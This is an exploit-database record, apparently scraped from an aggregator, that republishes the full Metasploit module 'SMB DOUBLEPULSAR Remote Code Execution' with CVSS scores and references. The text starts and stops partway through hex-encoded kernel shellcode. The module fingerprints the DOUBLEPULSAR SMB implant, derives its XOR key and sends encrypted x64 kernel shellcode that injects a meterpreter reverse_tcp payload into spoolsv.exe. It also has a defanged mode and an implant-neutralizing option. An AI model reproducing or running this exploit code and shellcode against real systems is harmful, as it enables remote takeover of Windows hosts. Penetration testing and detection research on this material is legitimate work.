\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-07] #"}, "lastseen": "2021-10-06T22:17:02", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "dd2ec6a7ad6bcca169764af4ce7a284e", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-08T00:16:50", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:16:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-08T00:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n 